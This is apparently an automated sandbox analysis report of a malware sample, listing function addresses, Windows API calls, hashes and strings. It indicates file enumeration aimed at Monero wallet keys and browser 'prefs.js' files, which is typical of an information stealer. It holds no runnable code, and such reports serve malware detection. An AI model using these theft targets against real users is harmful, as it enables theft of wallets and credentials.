                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextwsprintf
                          • String ID: %s\%s$%s\%s$%s\*
                          • API String ID: 180737720-445461498
                          • Opcode ID: 843da0753268fd6ca777a8ac001ee6e7d3d8c2c9ebe95c8e629ef2f60f2ff261
                          • Instruction ID: 50c6bbd3cac8101d06053f2c48e8c3816d6c4c3e8b54b609e6f8fe406fd824fd
                          • Opcode Fuzzy Hash: 843da0753268fd6ca777a8ac001ee6e7d3d8c2c9ebe95c8e629ef2f60f2ff261
                          • Instruction Fuzzy Hash: DB6167B2510218ABCB20EBA4DC85FEA77BCFB48700F4045D8B649D6190EB71DB85CFA1
                          Function 00B04570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00B04580
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00B04587
                          • wsprintfA.USER32 ref: 00B045A6
                          • FindFirstFileA.KERNEL32(?,?), ref: 00B045BD
                          • StrCmpCA.SHLWAPI(?,00B10FC4), ref: 00B045EB
                          • StrCmpCA.SHLWAPI(?,00B10FC8), ref: 00B04601
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00B0468B
                          • FindClose.KERNEL32(000000FF), ref: 00B046A0
                          • lstrcat.KERNEL32(?,018AFC80), ref: 00B046C5
                          • lstrcat.KERNEL32(?,018AE6E8), ref: 00B046D8
                          • lstrlen.KERNEL32(?), ref: 00B046E5
                          • lstrlen.KERNEL32(?), ref: 00B046F6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                          • String ID: %s\%s$%s\*
                          • API String ID: 671575355-2848263008
                          • Opcode ID: 1cb02a570f536ba9b8c1797767cc1ff38cdbe676f6bea0156686ce8a0ff9f4c3
                          • Instruction ID: 5865cbd5aa2e12d5ffcc70868d275d82b466accfebc53d5033165f34c3c32598
                          • Opcode Fuzzy Hash: 1cb02a570f536ba9b8c1797767cc1ff38cdbe676f6bea0156686ce8a0ff9f4c3
                          • Instruction Fuzzy Hash: 395144B16103189BC724EB74DC89FE977BCAB58300F4045C8B649D6190EF75DB858FA1
                          Function 00B03EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                          Download Yara Rule
                          APIs
                          • wsprintfA.USER32 ref: 00B03EC3
                          • FindFirstFileA.KERNEL32(?,?), ref: 00B03EDA
                          • StrCmpCA.SHLWAPI(?,00B10FAC), ref: 00B03F08
                          • StrCmpCA.SHLWAPI(?,00B10FB0), ref: 00B03F1E
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00B0406C
                          • FindClose.KERNEL32(000000FF), ref: 00B04081
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextwsprintf
                          • String ID: %s\%s
                          • API String ID: 180737720-4073750446
                          • Opcode ID: fc960528e743d649a95bd1398aea07a6ced6fe1d3b29b2834a8df06a8eaff3e5
                          • Instruction ID: d4993df969561306adb0c5974a7f2b1601070d21f1d679efb4c7308c06af76f1
                          • Opcode Fuzzy Hash: fc960528e743d649a95bd1398aea07a6ced6fe1d3b29b2834a8df06a8eaff3e5
                          • Instruction Fuzzy Hash: 125148B2900318ABCB24FBB4DC85EEA77BCBB54700F4045C8B75996190EB75DB858FA1
                          Function 00AFED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                          Download Yara Rule
                          APIs
                          • wsprintfA.USER32 ref: 00AFED3E
                          • FindFirstFileA.KERNEL32(?,?), ref: 00AFED55
                          • StrCmpCA.SHLWAPI(?,00B11538), ref: 00AFEDAB
                          • StrCmpCA.SHLWAPI(?,00B1153C), ref: 00AFEDC1
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00AFF2AE
                          • FindClose.KERNEL32(000000FF), ref: 00AFF2C3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextwsprintf
                          • String ID: %s\*.*
                          • API String ID: 180737720-1013718255
                          • Opcode ID: 4f05e0979c00ec5744e139e6c32c630c07b634778b31190e08824a5058017866
                          • Instruction ID: cf0d562d6ab7da8edef527a1f28c19547df6aca493241853bb624951b6774a30
                          • Opcode Fuzzy Hash: 4f05e0979c00ec5744e139e6c32c630c07b634778b31190e08824a5058017866
                          • Instruction Fuzzy Hash: D3E1B2719113189AEB54FB64DD52EEE77B8AF54300F4089D9B50A620D2EF306F8ACF52
                          Function 00AFF6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B0A740: lstrcpy.KERNEL32(00B10E17,00000000), ref: 00B0A788
                            • Part of subcall function 00B0A920: lstrcpy.KERNEL32(00000000,?), ref: 00B0A972
                            • Part of subcall function 00B0A920: lstrcat.KERNEL32(00000000), ref: 00B0A982
                            • Part of subcall function 00B0A9B0: lstrlen.KERNEL32(?,018A89C8,?,\Monero\wallet.keys,00B10E17), ref: 00B0A9C5
                            • Part of subcall function 00B0A9B0: lstrcpy.KERNEL32(00000000), ref: 00B0AA04
                            • Part of subcall function 00B0A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B0AA12
                            • Part of subcall function 00B0A8A0: lstrcpy.KERNEL32(?,00B10E17), ref: 00B0A905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00B115B8,00B10D96), ref: 00AFF71E
                          • StrCmpCA.SHLWAPI(?,00B115BC), ref: 00AFF76F
                          • StrCmpCA.SHLWAPI(?,00B115C0), ref: 00AFF785
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00AFFAB1
                          • FindClose.KERNEL32(000000FF), ref: 00AFFAC3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                          • String ID: prefs.js
                          • API String ID: 3334442632-3783873740
                          • Opcode ID: 961bbeb686454932c3c45bbc8fb4985e574f2ff4a280db3bf121f80b8fcb80be
                          • Instruction ID: e3f52268f0e73c80291a20304bd3445d2bfa50b8ea88e9d1eda2f5745ba178c0
                          • Opcode Fuzzy Hash: 961bbeb686454932c3c45bbc8fb4985e574f2ff4a280db3bf121f80b8fcb80be
                          • Instruction Fuzzy Hash: 35B111719003089BDB24FF64DD95FEE77B9AF94300F4085E8A50A961D1EF319B49CB92
                          Function 00AF16D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B0A740: lstrcpy.KERNEL32(00B10E17,00000000), ref: 00B0A788
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00B1510C,?,?,?,00B151B4,?,?,00000000,?,00000000), ref: 00AF1923
                          • StrCmpCA.SHLWAPI(?,00B1525C), ref: 00AF1973
                          • StrCmpCA.SHLWAPI(?,00B15304), ref: 00AF1989
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00AF1D40
                          • DeleteFileA.KERNEL32(00000000), ref: 00AF1DCA
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00AF1E20
                          • FindClose.KERNEL32(000000FF), ref: 00AF1E32
                            • Part of subcall function 00B0A920: lstrcpy.KERNEL32(00000000,?), ref: 00B0A972
                            • Part of subcall function 00B0A920: lstrcat.KERNEL32(00000000), ref: 00B0A982
                            • Part of subcall function 00B0A9B0: lstrlen.KERNEL32(?,018A89C8,?,\Monero\wallet.keys,00B10E17), ref: 00B0A9C5
                            • Part of subcall function 00B0A9B0: lstrcpy.KERNEL32(00000000), ref: 00B0AA04
                            • Part of subcall function 00B0A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B0AA12
                            • Part of subcall function 00B0A8A0: lstrcpy.KERNEL32(?,00B10E17), ref: 00B0A905
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                          • String ID: \*.*
                          • API String ID: 1415058207-1173974218
                          • Opcode ID: 7c79884c8330ef9a4c6845cb779d01812dbf7b3ec3b9a8b04c4fcc93d98e61dd
                          • Instruction ID: b371c142efd5210aa1c8e52002be18a4af91b4eb68216638ef4e7aaf4c2fd72d
                          • Opcode Fuzzy Hash: 7c79884c8330ef9a4c6845cb779d01812dbf7b3ec3b9a8b04c4fcc93d98e61dd
                          • Instruction Fuzzy Hash: 1912DC719103189ADB59FB60DC96EEE77B8AF54300F4089D9B50A620D1EF706F89CFA1
                          Function 00AFDE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B0A740: lstrcpy.KERNEL32(00B10E17,00000000), ref: 00B0A788
                            • Part of subcall function 00B0A9B0: lstrlen.KERNEL32(?,018A89C8,?,\Monero\wallet.keys,00B10E17), ref: 00B0A9C5
                            • Part of subcall function 00B0A9B0: lstrcpy.KERNEL32(00000000), ref: 00B0AA04
                            • Part of subcall function 00B0A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B0AA12
                            • Part of subcall function 00B0A8A0: lstrcpy.KERNEL32(?,00B10E17), ref: 00B0A905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00B10C2E), ref: 00AFDE5E
                          • StrCmpCA.SHLWAPI(?,00B114C8), ref: 00AFDEAE
                          • StrCmpCA.SHLWAPI(?,00B114CC), ref: 00AFDEC4
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00AFE3E0
                          • FindClose.KERNEL32(000000FF), ref: 00AFE3F2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                          • String ID: \*.*
                          • API String ID: 2325840235-1173974218
                          • Opcode ID: a07f19897e0349313769b74fc3cff7b2d2d12a6b06e6071fbdea407213ae765c
                          • Instruction ID: 3dfcb8fcbab0b36a95b7b188a6b514347b89adfe040998ad6363905dccab1146
                          • Opcode Fuzzy Hash: a07f19897e0349313769b74fc3cff7b2d2d12a6b06e6071fbdea407213ae765c
                          • Instruction Fuzzy Hash: D7F19E719203189ADB55FB64DD95EEE77B8AF24300F8045D9B50A620D1EF306F8ACF62
                          Function 00AFDA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B0A740: lstrcpy.KERNEL32(00B10E17,00000000), ref: 00B0A788
                            • Part of subcall function 00B0A920: lstrcpy.KERNEL32(00000000,?), ref: 00B0A972
                            • Part of subcall function 00B0A920: lstrcat.KERNEL32(00000000), ref: 00B0A982
                            • Part of subcall function 00B0A9B0: lstrlen.KERNEL32(?,018A89C8,?,\Monero\wallet.keys,00B10E17), ref: 00B0A9C5
                            • Part of subcall function 00B0A9B0: lstrcpy.KERNEL32(00000000), ref: 00B0AA04
                            • Part of subcall function 00B0A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B0AA12
                            • Part of subcall function 00B0A8A0: lstrcpy.KERNEL32(?,00B10E17), ref: 00B0A905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00B114B0,00B10C2A), ref: 00AFDAEB
                          • StrCmpCA.SHLWAPI(?,00B114B4), ref: 00AFDB33
                          • StrCmpCA.SHLWAPI(?,00B114B8), ref: 00AFDB49
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00AFDDCC
                          • FindClose.KERNEL32(000000FF), ref: 00AFDDDE
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                          • String ID:
                          • API String ID: 3334442632-0
                          • Opcode ID: 59677464a3cd44ca0d9116e5e415b7904d623d3eb4a2a23cd21a78efdc719ddb
                          • Instruction ID: e1b232459619a5e4c837eed26329763f228070e6e6a27b71898c2f6670243b9b
                          • Opcode Fuzzy Hash: 59677464a3cd44ca0d9116e5e415b7904d623d3eb4a2a23cd21a78efdc719ddb
                          • Instruction Fuzzy Hash: 11913572A0030897CB14FBB4DD56EFD77BDAB94300F408A98F946961D1EE349B49CB92
                          Function 00EB9D46 Relevance: 11.7, Strings: 8, Instructions: 1694COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: )$:]?{$:u#$;]?{$BIdZ${au$6[]$_u
                          • API String ID: 0-1961496635
                          • Opcode ID: 0a7fdb78607086a42ff57b10316f80dccb247349f5a00988baf1d2449454c88a
                          • Instruction ID: 127b8985b02d5d0873949775f36c96eeff28237dd8d4d55a39556b73be37f27b
                          • Opcode Fuzzy Hash: 0a7fdb78607086a42ff57b10316f80dccb247349f5a00988baf1d2449454c88a
                          • Instruction Fuzzy Hash: 3DB238F3A082109FE304AE2DEC8567AFBE9EF94720F1A453DE6C4C7744EA3558058697
                          Function 00EB6774 Relevance: 11.6, Strings: 8, Instructions: 1607COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: ~$$o?S$4<O$V<w0$[$0o$c$~?$p3K$wt{g
                          • API String ID: 0-1811294496
                          • Opcode ID: c91f58355619ce8ef608a7838a1a3c24529d5e6a5a93e5b1dc5e8252942753e9
